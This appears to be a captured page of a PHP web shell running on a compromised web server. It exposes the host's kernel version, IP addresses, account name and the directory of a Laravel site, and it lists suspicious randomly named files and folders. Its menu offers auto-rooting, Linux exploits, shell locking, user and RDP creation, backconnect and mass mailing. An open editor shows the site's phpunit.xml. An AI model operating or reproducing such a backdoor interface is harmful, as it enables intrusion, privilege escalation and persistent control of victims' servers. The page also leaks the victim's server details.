Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.139
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechvethouse.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
bpnsfhe
[ DIR ]
drwxr-xr-x
cfovgbu
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
drj1wpk
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
ksfluzw
[ DIR ]
drwxr-xr-x
kwjfyzn
[ DIR ]
drwxr-xr-x
lypgcqa
[ DIR ]
drwxr-xr-x
nrtoypv
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
zjeoyrf
[ DIR ]
drwxr-xr-x
.env
1.81
KB
-rw-r--r--
.env.example
1.72
KB
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
406
B
-rw-r--r--
.htaccess
1.96
KB
-r--r--r--
.php_cs
470
B
-rw-r--r--
.prettierrc
98
B
-rw-r--r--
.shift
131
B
-rw-r--r--
artisan
1.61
KB
-rw-r--r--
composer.json
2.89
KB
-rw-r--r--
composer.lock
416.44
KB
-rw-r--r--
error_log
9.18
KB
-rw-r--r--
index.php
21.54
KB
-r--r--r--
license-xanm.php
629
B
-rw-r--r--
nepajmvm.php
167.15
KB
-rw-r--r--
package-lock.json
955.73
KB
-rw-r--r--
package.json
1.65
KB
-rw-r--r--
phpunit.xml
1.11
KB
-rw-r--r--
readme.md
757
B
-rw-r--r--
readme.pdf
19.33
KB
-rw-r--r--
robots.txt
88
B
-rw-r--r--
server.php
563
B
-rw-r--r--
webpack.mix.js
4.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpunit.xml
<?xml version="1.0" encoding="UTF-8"?> <phpunit backupGlobals="false" backupStaticAttributes="false" bootstrap="vendor/autoload.php" colors="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="true" processIsolation="false" stopOnFailure="false"> <testsuites> <testsuite name="Unit"> <directory suffix="Test.php">./tests/Unit</directory> </testsuite> <testsuite name="Feature"> <directory suffix="Test.php">./tests/Feature</directory> </testsuite> </testsuites> <filter> <whitelist processUncoveredFilesFromWhitelist="true"> <directory suffix=".php">./app</directory> </whitelist> </filter> <php> <env name="APP_ENV" value="testing"/> <env name="BCRYPT_ROUNDS" value="4"/> <env name="CACHE_DRIVER" value="array"/> <env name="SESSION_DRIVER" value="array"/> <env name="QUEUE_CONNECTION" value="sync"/> <env name="MAIL_DRIVER" value="array"/> </php> </phpunit>
Close